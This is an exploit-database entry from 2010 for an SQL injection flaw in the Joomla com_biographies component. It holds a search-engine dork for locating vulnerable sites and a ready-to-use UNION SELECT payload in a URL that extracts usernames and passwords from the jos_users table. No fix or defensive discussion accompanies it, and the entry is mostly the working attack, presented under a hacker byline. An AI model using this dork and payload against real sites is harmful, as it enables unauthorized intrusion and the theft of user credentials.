Joomla Component com_biographies SQL injection Vulnerability

# Title: Joomla Component com_biographies SQL injection Vulnerability
# EDB-ID: 11226
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Snakespc
# Published: 2010-01-22
# Verified: yes
# Download Exploit Code
# Download N/A

view source
print?
#--------------------------------------------------------
#Joomla (com_biographies) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#-------------------------------------------------------
#Dork:inurl"com_biographies"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--